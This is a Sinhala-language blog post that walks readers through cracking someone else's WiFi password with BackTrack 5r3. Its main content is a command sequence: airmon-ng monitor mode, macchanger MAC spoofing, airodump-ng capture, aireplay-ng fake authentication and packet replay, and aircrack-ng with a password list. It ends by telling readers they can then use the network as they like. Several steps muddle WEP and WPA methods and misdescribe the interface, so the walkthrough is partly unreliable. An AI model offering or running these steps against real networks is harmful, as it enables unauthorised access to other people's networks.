කොහොමද යාලුවනේ ඔයාලට.ගොඩ දවසකින් මුකුත් දෙන්නත් බැරිඋනා ඔයාලට.ඔන්න අද මම දෙන්නෙ නියම පෝස්ට් එකක්.ඔයාල හැමෝම කැමති ඇතිනෙ Hacking වලට.ඔන්න මම අද දෙන්න හදන්නෙ Hacking එකක්.WIFI Password එකක් හැක් කරන්නෙ කොහොමද කියල තමයි මම අද ඔයාලට කියල දෙන්න හදන්නෙ.


මම දන්නව අපේ උන් හැකින් එකක් කිවුවොත් නොකා නොබී හරි ඒක කරනව.ෆේස්බුක් ගෲප් කිහිපෙකම අහල තිබුන WiFi හැක් කරන්නෙ කොහොමද කියල.මට පොඩි අප්සට් එකකට තියෙන්නෙ Video එකක් කරල දාන්න බැරි උන එක.ඒක නිසා ඉංග්‍රීසි පෝස්ට් එකක් ට්‍රාන්ස්ලේට් කරල ඔයාලට දෙන්න උනා..

ඔයාලට WiFi Hack කරන්න මෙන්න මේ ටික ඕන වෙනව.

Compatible Wireless Adapter
Linax BackTrack 5r3 DVD



WiFi තියෙනම් Compatible Wireless Adapter එකක් ඔයාල ගාව තියෙනවනෙ.BackTrack 5r3 නැති කට්ටිය මෙතනින් ගිහින් අරගන්න.Virtuual Machine එකෙන් ඔයාගෙ පරිගනකට ස්තාපනය කරගන්න.ඒකට මම බාවිතා කරේ  VmWare මෘදුකාංගය.

හරි ඔන්න එහෙනම් අපි වඩේට බහිමු.ඔයාල බැක්ට්‍රැක් දාගත්තනේ.දැන්  ඔයාල Shell  Commands එකක් Open කරගන්න.ඒකෙ මේ විදානය දෙන්න.එතකොට දැනට තියන WiFi නෙට්වර්ක් මොනවද කියලා පෙන්නනවා.

airmon-ng


මෙතන පෙන්නන ra0 කියන WiFi නෙට්වර්ක්  එක උපකාර කරගෙනයි මම ඉස්සරහට  ඔයාලට හැමදේම කියන්නෙ. ඔයාලා ra0 වෙනුවට භාවිතා කරන්න ඕනේ ඔයාලට හැක් කරන්න් ඕනේ WiFi නෙට්වර්ක්  එකේ නම හොඳේ.



දැන් මේ විදානය දෙන්න.
airmon-ng stop ra0

මෙතනදි අපි කරන්නෙ හැක් කරන්න ඕනේ WiFi නෙට්වර්ක් එකේ මැක් ඇඩ්ර්ස් එක වෙනස් කරන්න.දැන් මේ විදානය දෙන්න.

ifconfig ra0 down

දැන් මේ විදානය දෙන්න.

macchanger --mac 00:11:22:33:44:55 ra0

දැන් මේ විදානය දෙන්න.

airmon-ng start ra0

මෙතනදි අපි කරන්නෙ අලුත් කරපු මැක් ඇඩ්ර්ස් එක නිවැරදි ආකාරයෙන් වැඩ කරනවද බලන එක. දැන් මේ විදානය දෙන්න.
  
airodump-ng ra0
මේකෙ BSSID Code එක Copy කරල තියාගන්න.මොකද ඉස්සරහට ඕන වෙනව.දැන් මේ විදානය දෙන්න.

airodump-ng -c (CHANNEL) -w (ESSID NAME) --bssid (BSSID NUMBER) ra0

මෙතනදි අපිට පුලුවන් අපි හැක් කරන්න යන WiFi නෙට්වර්ක් එකේ නියම නම,SSID එක හොයා ගන්න.. ඊට පස්සෙ අපිට් පුලුවන් අපි හැක් කරන්න් යන WiFi නෙට්වර්ක් එකට මේ වෙනකොට ලොග් වෙල් ඉන්න් කෙනෙක්ව හොයගන්න. දැන් මේ විදානය දෙන්න.

aireplay-ng -1 0 -a (BSSID NUMBER) -h 00:11:22:33:44:55 -e (ESSID NAME) ra0

දැන් මේ විදානය දෙන්න.

aireplay-ng -3 -b (BSSID NUMBER) -h 00:11:22:33:44:55 ra0




දැන් මේ විදානය දෙන්න.



aircrack-ng -b (BSSID NUMBER) (ESSID NAME-01.cap)
ඊට පස්සෙ අපිට පුලුවන් දැනට ලොග් වෙල් ඉන්න කෙනාගේ උදවුවෙන් ලොග් වෙල ඉන්න WiFi නෙට්වර්ක් එකේ පාස්කී එක ලබා ගන්න. ඒකට පහල විදානය දෙන්න. මෙතන් list කියන තැනට අපි අර බාගත්ත පාස්වර්ඩ් ලිස්ට් එකේ පාත් එක දෙන්න ඕනේ.

 aircrack-ng crackwpa-01.cap –w list


මය කරන උදව්වක් විදිහට මේ පල්ලේ ads එකත් ඔබලාම යන්න :D





ඔන්න KEY එක හොයා ගත්ත. දැන් ඉතින් අපිට පුලුවන් ඒ පාස් කී එක බාවිතා කරල අපිට ඕනේ විදියට නෙට්වර්ක්  එකා බාවිතා කරන්න.

ඔහොම තෙරෙන්නෙ නැති කට්ටියට මමගාව තිබුන Net බාගත්තු වීඩියෝ එකක් Youtube Upload කරා.Linax BackTrack 5 එකෙන් WiFi Password එකක් හැක් කරන්න කියල දෙන වීඩියෝ එකක්.හරිම ලේසි...සරල ඉංග්‍රීසියෙන් තියෙන්නෙ.බලන්න එහෙනම්....



* _______________________________________________________ *
වෙබ් අඩවියේ සාමාජිකයෙකු වීමට වම් පස පහලම Join This Site මත Click කරන්න.ඔබට එවිට එසැනින් අලුත් ලිපි ලබා ගත හැක.


තවත් මේවගේ වටින කියන ලිපියකින් හමුවෙමු.
ඔබේ වටිනා අදහස් පහතින් දාන්නත් පුලුවන්
Amazin
Powered by Blogger.